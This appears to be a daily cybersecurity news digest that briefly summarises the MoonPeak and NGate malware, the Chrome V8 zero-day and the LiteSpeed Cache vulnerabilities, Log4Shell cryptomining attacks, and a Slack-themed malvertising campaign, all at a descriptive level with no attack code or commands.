From a North Korean RAT that’s constantly adapting to evade detection, to a critical Chrome vulnerability and a sneaky malvertising campaign, cyber threats show no signs of slowing down. Researchers identified a new RAT family called MoonPeak, developed by a North Korean group, which is increasingly difficult to detect as it evolves.

Meanwhile, Google patched a high-severity zero-day vulnerability in Chrome’s V8 engine, fixing an issue that could allow attackers to access memory out of bounds.

Additionally, a malvertising campaign has been tricking users searching for Slack, redirecting them to malicious sites and delivering a RAT with stealer capabilities.

Top Malware Reported in the Last 24 Hours

MoonPeak: new RAT by North Korean threat cluster

Cisco Talos identified a new RAT family called MoonPeak, which is based on the XenoRAT malware and is actively being developed by a North Korean threat actor known as UAT-5394. The MoonPeak malware has been evolving gradually, with each new variant introducing changes to make detection more difficult and prevent unauthorized connections to the C2 server. The threat actors have made modifications to the source code of XenoRAT, upon which MoonPeak is based, to ensure compatibility with their infrastructure and prevent rogue implants from connecting.

NGate Android malware steals cash

ESET researchers discovered a sophisticated criminal campaign that targeted clients of Czech banks, using a unique Android malware called NGate. The malware relays data from victims' payment cards to the attacker's device, allowing them to clone the card and make unauthorized ATM withdrawals. The attackers initially used phishing and malicious apps to steal banking credentials before deploying NGate. The malware prompts victims to input sensitive information and enable NFC on their devices, subsequently relaying the NFC data to the attacker.

Top Vulnerabilities Reported in the Last 24 Hours

Chrome 0-day under active exploitation

Google patched a new zero-day vulnerability (CVE-2024-7971) in Chrome, which was being exploited by attackers. The vulnerability is a high-severity issue caused by a type confusion weakness in the V8 JavaScript engine used by Chrome and other Chromium-based browsers. This type confusion can lead to out-of-bounds memory access in languages like C and C++. Google has released a fix in Chrome version 128.0.6613.84/.85 for Windows and Mac, and 128.0.6613.84 for Linux.

Log4j exploited again!

In a recent incident, a Log4Shell exploitation attempt was identified from a known Tor exit node. Attackers were found using the Log4Shell vulnerability to deploy cryptocurrency mining software onto compromised systems. The attacks are sending obfuscated LDAP requests to trigger malicious script execution. This allows attackers to establish persistence, gather system information, and exfiltrate data, while maintaining control through backdoors and encrypted communication channels.

Critical bug in another WordPress plugin

The LiteSpeed Cache plugin for WordPress has been found to have a critical security vulnerability (CVE-2024-28000) that allows unauthenticated users to gain administrator privileges, potentially leading to malicious plugin installation. The flaw stems from a weak security hash used in the plugin's user simulation feature, making it possible for attackers to spoof their user ID and exploit the vulnerability. Although the issue has been patched in version 6.4, it is crucial for users to update their plugin to mitigate the risk.

Top Scams Reported in the Last 24 Hours

Suspicious Slack ad for malvertising purposes

A sophisticated malvertising campaign has been targeting users searching for the popular communication tool Slack. The threat actor used Google ads to redirect victims to a decoy page impersonating Slack, which then prompted users to download a malware payload. The campaign involved multiple layers of redirection and cloaking techniques to evade detection. Ultimately, the malware payload was identified as a RAT with stealer capabilities.